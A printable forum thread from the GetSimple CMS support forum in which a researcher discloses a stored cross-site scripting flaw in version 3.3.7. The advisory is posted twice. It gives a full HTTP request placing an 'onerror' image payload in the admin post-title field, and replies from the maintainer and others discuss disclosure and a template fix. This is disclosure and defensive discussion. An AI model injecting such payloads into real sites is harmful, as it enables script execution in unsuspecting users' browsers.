BUG REPORT GetSimple CMS Security Vulnerabilities Notification - Printable Version +- GetSimple Support Forum (http://get-simple.info/forums) +-- Forum: GetSimple (http://get-simple.info/forums/forumdisplay.php?fid=3) +--- Forum: General Questions and Problems (http://get-simple.info/forums/forumdisplay.php?fid=16) +--- Thread: BUG REPORT GetSimple CMS Security Vulnerabilities Notification (/showthread.php?tid=7758) |
GetSimple CMS Security Vulnerabilities Notification - SachinWagh - 2015-12-06 ================================================================ GetSimple CMS – Version 3.3.7 – Cross-Site Scripting Vulnerability ================================================================ Information -------------------- Vulnerability Type : Cross Site Scripting Vulnerability Vulnerable Version : 3.3.7 Vendor Homepage:http://get-simple.info/ CVE-ID : Severity : Medium Author – Sachin Wagh (@tiger_tigerboy) Description -------------------- GetSimple CMS – Version 3.3.7 is prone to Multiple a Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Proof of Concept URL -------------------- 1.Burp Request POST /GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/changedata.php HTTP/1.1 Host: 192.168.43.247 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/edit.php?id=index Cookie: resolveIDs=0; _ga=GA1.1.887840288.1449038898; _gat=1; __atuvc=1%7C48; __atuvs=565e943f4578f9bd000; GS_ADMIN_USERNAME=root; 23d26db5c4d135b5023bc2a6f56e8b43fd28957a=2b306ac4a5da6faed782e8c4eefa9f88ecfe4279 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 374 nonce=cf4df04f528f5eef2cb82bd16febfc841bac45ec&post-author=root&post-title= "><img src=x onerror=prompt(1)>&post-private=&post-parent=&post-template=template.php&post-menu-enable=on&post-menu=Home&post-menu-order=1&post-id=index&post-metak=getsimple%2C+easy%2C+content+management+system&post-metad=+%22%3E&post-content=%3Cp%3EBlog%3C%2Fp%3E%0D%0A&existing-url=index&redirectto=&submitted=Save+Updates 2.After saving go to http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/ Advisory Information: ================================================ GetSimple CMS XSS Vulnerability Severity Level: ========================================================= Med Description: ========================================================== Vulnerable Product: [+] GetSimple CMS 3.3.7 Vulnerable Parameter(s): [+] post-title Affected Area(s): [+] http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/ Credits & Authors -------------------- Sachin Wagh (@tiger_tigerboy) ================================================================ GetSimple CMS – Version 3.3.7 – Cross-Site Scripting Vulnerability ================================================================ Information -------------------- Vulnerability Type : Cross Site Scripting Vulnerability Vulnerable Version : 3.3.7 Vendor Homepage:http://get-simple.info/ CVE-ID : Severity : Medium Author – Sachin Wagh (@tiger_tigerboy) Description -------------------- GetSimple CMS – Version 3.3.7 is prone to Multiple a Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Proof of Concept URL -------------------- 1.Burp Request POST /GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/changedata.php HTTP/1.1 Host: 192.168.43.247 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/edit.php?id=index Cookie: resolveIDs=0; _ga=GA1.1.887840288.1449038898; _gat=1; __atuvc=1%7C48; __atuvs=565e943f4578f9bd000; GS_ADMIN_USERNAME=root; 23d26db5c4d135b5023bc2a6f56e8b43fd28957a=2b306ac4a5da6faed782e8c4eefa9f88ecfe4279 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 374 nonce=cf4df04f528f5eef2cb82bd16febfc841bac45ec&post-author=root&post-title= "><img src=x onerror=prompt(1)>&post-private=&post-parent=&post-template=template.php&post-menu-enable=on&post-menu=Home&post-menu-order=1&post-id=index&post-metak=getsimple%2C+easy%2C+content+management+system&post-metad=+%22%3E&post-content=%3Cp%3EBlog%3C%2Fp%3E%0D%0A&existing-url=index&redirectto=&submitted=Save+Updates 2.After saving go to http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/ Advisory Information: ================================================ GetSimple CMS XSS Vulnerability Severity Level: ========================================================= Med Description: ========================================================== Vulnerable Product: [+] GetSimple CMS 3.3.7 Vulnerable Parameter(s): [+] post-title Affected Area(s): [+] http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/ For any questions related to this notification message - please contact on : wsachin092@gmail.com Best Regards, Sachin Wagh RE: GetSimple CMS Security Vulnerabilities Notification - HelgeSverre - 2015-12-06 Did you send this to shawn_a before publicly disclosing this vulnerability? RE: GetSimple CMS Security Vulnerabilities Notification - shawn_a - 2015-12-06 Ill fix these in 3.3.8 probably they are moderate, since they require admin privs RE: GetSimple CMS Security Vulnerabilities Notification - shawn_a - 2015-12-06 I cannot reproduce this, onerror get removed by xss_clean maybe I am not reproducing payload properly. RE: GetSimple CMS Security Vulnerabilities Notification - Carlos - 2015-12-06 Fix: replace <?php get_page_title(); ?> by <?php echo htmlspecialchars(get_page_title(false)); ?> in your template.(to make get_page_title render page titles as text instead of html) RE: GetSimple CMS Security Vulnerabilities Notification - SachinWagh - 2015-12-09 (2015-12-06, 19:16:32)Carlos Wrote: Fix: replace Hello shawn_a, Can you share the email-id so I can send POC Video. RE: GetSimple CMS Security Vulnerabilities Notification - The_Shopkeeper - 2017-11-09 Sorry to raise an old thread. Was the XSS Vulnerability addressed in later versions after v3.3.7? I can't find any further reference to it. RE: GetSimple CMS Security Vulnerabilities Notification - shawn_a - 2017-11-09 Did you check github or release notes? |